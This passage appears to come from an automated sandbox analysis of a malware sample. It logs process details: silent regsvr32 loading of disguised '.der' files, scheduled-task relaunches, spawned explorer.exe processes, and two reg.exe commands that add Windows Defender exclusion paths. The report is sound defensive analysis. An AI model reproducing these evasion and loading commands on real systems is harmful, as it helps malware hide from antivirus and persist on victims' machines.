          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: regsvr32.exe PID: 1448 Parent PID: 2796

          General

          Start time:16:34:20
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -silent ..\Fiosa1.der
          Imagebase:0x200000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: taskeng.exe PID: 2424 Parent PID: 896

          General

          Start time:16:34:21
          Start date:24/09/2021
          Path:C:\Windows\System32\taskeng.exe
          Wow64 process (32bit):false
          Commandline:taskeng.exe {7B099BF3-11FE-497B-BFDA-BF23CFB73488} S-1-5-18:NT AUTHORITY\System:Service:
          Imagebase:0xffb30000
          File size:464384 bytes
          MD5 hash:65EA57712340C09B1B0C427B4848AE05
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: regsvr32.exe PID: 2344 Parent PID: 2424

          General

          Start time:16:34:21
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: regsvr32.exe PID: 2276 Parent PID: 2344

          General

          Start time:16:34:22
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -s 'C:\Users\user\Fiosa.der'
          Imagebase:0x200000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: regsvr32.exe PID: 1892 Parent PID: 2664

          General

          Start time:16:34:22
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32 -silent ..\Fiosa2.der
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: regsvr32.exe PID: 3060 Parent PID: 1892

          General

          Start time:16:34:22
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -silent ..\Fiosa2.der
          Imagebase:0x200000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: explorer.exe PID: 548 Parent PID: 3060

          General

          Start time:16:34:47
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x870000
          File size:2972672 bytes
          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: explorer.exe PID: 2912 Parent PID: 2276

          General

          Start time:16:34:49
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x870000
          File size:2972672 bytes
          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: reg.exe PID: 908 Parent PID: 2912

          General

          Start time:16:34:52
          Start date:24/09/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
          Imagebase:0xff810000
          File size:74752 bytes
          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: reg.exe PID: 2652 Parent PID: 2912

          General

          Start time:16:34:53
          Start date:24/09/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
          Imagebase:0xffac0000
          File size:74752 bytes
          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: regsvr32.exe PID: 1960 Parent PID: 2424

          General

          Start time:16:36:00
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
          Imagebase:0xfffb0000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Analysis Process: regsvr32.exe PID: 1468 Parent PID: 1960

          General

          Start time:16:36:00
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -s 'C:\Users\user\Fiosa.der'
          Imagebase:0x5e0000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Disassembly

          Code Analysis

          Reset < >